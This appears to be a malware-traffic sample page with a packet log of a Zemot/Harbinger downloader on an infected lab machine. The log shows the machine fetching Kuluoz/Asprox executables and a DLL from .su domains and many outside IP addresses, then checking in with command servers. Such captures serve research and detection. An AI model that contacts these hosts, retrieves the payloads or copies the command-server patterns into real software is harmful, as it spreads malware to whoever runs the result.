Zemot/Harbinger Rootkit Trojan Downloader Loads Kuluoz/Asprox Malware PCAP Traffic Sample

January 29, 2016

Download Zemot/Harbinger Kuluoz Trojan Downloader PCAP: zemot.pcap

2014-08-15 09:11:05.358087 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [P.], seq 1:294, ack 1, win 64240, length 293: HTTP: GET /b/shoe/749634 HTTP/1.1
GET /b/shoe/749634 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: raing-gerut.su
Cache-Control: no-cache
2014-08-15 09:11:05.358095 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 294, win 64240, length 0
2014-08-15 09:11:05.694537 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [P.], seq 1:149, ack 294, win 64240, length 148: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:11:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 0
Connection: close
2014-08-15 09:11:05.695797 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [F.], seq 294, ack 149, win 64092, length 0
2014-08-15 09:11:05.695816 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [.], ack 295, win 64239, length 0
2014-08-15 09:11:05.699398 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
2014-08-15 09:11:05.712765 IP 46.119.105.213.80 > 172.16.204.128.49268: Flags [FP.], seq 149, ack 295, win 64239, length 0
2014-08-15 09:11:05.712972 IP 172.16.204.128.49268 > 46.119.105.213.80: Flags [.], ack 150, win 64092, length 0
2014-08-15 09:11:06.045599 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 274730080:274731447, ack 3301971623, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Fri, 15 Aug 2014 14:11:04 GMT
Server: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6
X-Powered-By: PHP/5.3.3
Content-Length: 90112
Connection: close
Content-Type: text/html

2014-08-15 09:11:06.046425 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [.], seq 1367:2827, ack 1, win 64240, length 1460: HTTP
2014-08-15 09:11:06.046448 IP 212.38.166.26.80 > 172.16.204.128.49267: Flags [P.], seq 2827:4101, ack 1, win 64240, length 1274: HTTP

2014-08-15 09:11:06.714346 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
2014-08-15 09:11:07.727996 IP 172.16.204.128.51462 > 172.16.204.2.53: 23471+ A? dients-lihuret.su. (35)
2014-08-15 09:11:07.729685 IP 172.16.204.2.53 > 172.16.204.128.51462: 23471 13/0/0 A 178.74.212.207, A 213.111.146.59, A 46.119.141.38, A 76.71.165.162, A 178.74.226.67, A 188.190.5.162, A 109.104.165.244, A 46.98.129.84, A 91.203.89.26, A 134.249.11.2, A 93.78.67.85, A 46.211.40.28, A 66.231.16.101 (243)
2014-08-15 09:11:07.730376 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [S], seq 3923929809, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-15 09:11:07.920077 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [S.], seq 493119538, ack 3923929810, win 64240, options [mss 1460], length 0
2014-08-15 09:11:07.920132 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [.], ack 1, win 64240, length 0
2014-08-15 09:11:07.930887 IP 172.16.204.128.49270 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:07.930896 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [.], ack 317, win 64240, length 0
2014-08-15 09:11:08.139123 IP 178.74.212.207.80 > 172.16.204.128.49270: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:37 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-08-15 09:11:12.974845 IP 172.16.204.128.49272 > 178.74.212.207.80: Flags [P.], seq 1:317, ack 1, win 64240, length 316: HTTP: GET /mod_articles-login-llget9/jquery/ HTTP/1.1
GET /mod_articles-login-llget9/jquery/ HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:11:12.974899 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [.], ack 317, win 64240, length 0
2014-08-15 09:11:13.209681 IP 178.74.212.207.80 > 172.16.204.128.49272: Flags [P.], seq 1:1368, ack 317, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:12:42 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.5.3-1ubuntu2.6
Content-disposition: attachment; filename=exe.exe
Pragma: no-cache

1f68
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2014-08-15 09:14:03.628461 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
2014-08-15 09:14:04.624698 IP 172.16.204.128.64854 > 172.16.204.2.53: 16404+ A? dients-lihuret.su. (35)
2014-08-15 09:14:05.327272 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 37.229.189.208, A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81 (259)
2014-08-15 09:14:05.329188 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [S], seq 357766832, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-15 09:14:05.442685 IP 172.16.204.2.53 > 172.16.204.128.64854: 16404 14/0/0 A 5.105.120.46, A 178.129.149.214, A 94.153.28.86, A 212.76.17.174, A 93.127.66.152, A 31.128.173.205, A 78.56.92.46, A 93.79.151.73, A 176.111.252.50, A 95.215.116.114, A 93.79.30.112, A 109.87.59.249, A 188.143.94.81, A 37.229.189.208 (259)
2014-08-15 09:14:05.664770 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [S.], seq 875893152, ack 357766833, win 64240, options [mss 1460], length 0
2014-08-15 09:14:05.664958 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [.], ack 1, win 64240, length 0
2014-08-15 09:14:05.665104 IP 172.16.204.128.49157 > 37.229.189.208.80: Flags [P.], seq 1:222, ack 1, win 64240, length 221: HTTP: GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
GET /mod_jshoppi-authssd5/soft64.dll HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: dients-lihuret.su
Cache-Control: no-cache
2014-08-15 09:14:05.665109 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [.], ack 222, win 64240, length 0
2014-08-15 09:14:05.920418 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: "53edc9e4-2ac04"
Accept-Ranges: bytes

2014-08-15 09:14:06.020081 IP 37.229.189.208.80 > 172.16.204.128.49157: Flags [P.], seq 1:1368, ack 222, win 64240, length 1367: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:35 GMT
Content-Type: application/octet-stream
Content-Length: 175108
Last-Modified: Fri, 15 Aug 2014 08:50:44 GMT
Connection: close
ETag: "53edc9e4-2ac04"
Accept-Ranges: bytes

2014-08-15 09:14:13.292765 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
2014-08-15 09:14:14.298401 IP 172.16.204.128.59897 > 172.16.204.2.53: 61172+ A? triple-bow.su. (31)
2014-08-15 09:14:14.915431 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 134.249.11.2, A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69 (223)
2014-08-15 09:14:14.921205 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [S], seq 1365434509, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-15 09:14:14.923071 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [S], seq 44314422, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2014-08-15 09:14:15.114950 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [S.], seq 2115704189, ack 1365434510, win 64240, options [mss 1460], length 0
2014-08-15 09:14:15.115089 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
2014-08-15 09:14:15.115380 IP 172.16.204.128.49159 > 134.249.11.2.80: Flags [P.], seq 1:335, ack 1, win 64240, length 334: HTTP: GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
GET /b/eve/6d35b731d8e445a0f044de3f HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: triple-bow.su
Connection: Keep-Alive
2014-08-15 09:14:15.115439 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [.], ack 335, win 64240, length 0
2014-08-15 09:14:15.131947 IP 134.249.11.2.80 > 172.16.204.128.49160: Flags [S.], seq 934879185, ack 44314423, win 64240, options [mss 1460], length 0
2014-08-15 09:14:15.132078 IP 172.16.204.128.49160 > 134.249.11.2.80: Flags [.], ack 1, win 64240, length 0
2014-08-15 09:14:15.239847 IP 172.16.204.2.53 > 172.16.204.128.59897: 61172 12/0/0 A 141.101.28.223, A 176.111.252.50, A 46.151.243.56, A 178.204.32.63, A 176.117.78.213, A 85.198.174.37, A 67.8.236.182, A 178.74.212.207, A 119.18.74.66, A 178.137.18.149, A 37.115.14.69, A 134.249.11.2 (223)
2014-08-15 09:14:15.462714 IP 134.249.11.2.80 > 172.16.204.128.49159: Flags [FP.], seq 1:179, ack 335, win 64240, length 178: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:14:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 29
Connection: close

<html><body>hi!</body></html>

2014-08-15 09:15:27.993338 IP 172.16.204.128.49169 > 195.114.145.69.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
GET /b/letr/493189686B4811B4DE99E325 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: triple-bow.su
Cache-Control: no-cache
2014-08-15 09:15:27.993353 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [.], ack 218, win 64240, length 0
2014-08-15 09:15:28.270522 IP 195.114.145.69.80 > 172.16.204.128.49169: Flags [P.], seq 1:1236, ack 218, win 64240, length 1235: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 15 Aug 2014 14:15:28 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: close

2014-08-15 09:15:29.210604 IP 172.16.204.128.49171 > 31.192.209.57.8080: Flags [P.], seq 1:223, ack 1, win 64240, length 222: HTTP: GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
GET /b/letr/AC82485B52C6EB38E71719A9 HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: 31.192.209.57:8080
Cache-Control: no-cache
2014-08-15 09:15:29.210638 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [.], ack 223, win 64240, length 0
2014-08-15 09:15:29.521750 IP 31.192.209.57.8080 > 172.16.204.128.49171: Flags [P.], seq 1:1242, ack 223, win 64240, length 1241: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Server: nginx/1.2.2
Date: Fri, 15 Aug 2014 14:19:07 GMT
Content-Type: application/octet-stream
Content-Length: 1083
Connection: close
